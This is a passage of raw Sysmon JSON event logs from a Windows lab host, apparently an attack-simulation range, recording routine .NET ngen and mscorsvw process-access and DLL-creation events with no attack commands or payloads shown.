C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.584","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010F8640F00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7861,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.584\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010F8640F00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.584","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010F8640F00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7862,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.584\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010F8640F00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.584","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010F8640F00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7863,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:39.990\r\nProcessGuid: {41C8662E-228F-5F25-0000-0010F8640F00}\r\nProcessId: 1476\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c4-0\\System.Messaging.dll\r\nCreationUtcTime: 2020-08-01 08:06:39.990","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:39.990","ProcessGuid":"{41C8662E-228F-5F25-0000-0010F8640F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c4-0\\System.Messaging.dll","CreationUtcTime":"2020-08-01 08:06:39.990","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7864,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.037\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-00101B690F00}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.037","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-00101B690F00}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7865,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.037\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-00101B690F00}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.037","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-00101B690F00}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7866,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-00101B690F00}\r\nTargetProcessId: 4236\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-00101B690F00}","TargetProcessId":"4236","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7867,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.131\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-00104D6C0F00}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.131","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-00104D6C0F00}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7868,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.131\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-00104D6C0F00}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.131","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-00104D6C0F00}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7869,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.131\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-00104D6C0F00}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 